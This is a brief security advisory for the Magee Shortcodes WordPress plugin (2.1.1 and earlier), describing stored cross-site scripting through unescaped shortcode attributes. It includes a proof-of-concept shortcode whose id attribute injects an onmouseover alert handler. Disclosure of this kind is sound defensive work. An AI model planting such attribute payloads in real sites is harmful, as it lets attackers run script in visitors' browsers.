Magee Shortcodes <= 2.1.1 - Contributor+ Stored XSS via shortcode

Description The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

PoC

[ms_alert icon=“fa-exclamation-circle” background_color=“#ffcc00” text_color=“#ffffff” border_width=“0” border_radius=“0” box_shadow=“no” dismissable=“yes” class=“” id=‘" onmouseover=“alert(/XSS/)”’]Warning! Better check yourself, you’re not looking too good.[/ms_alert]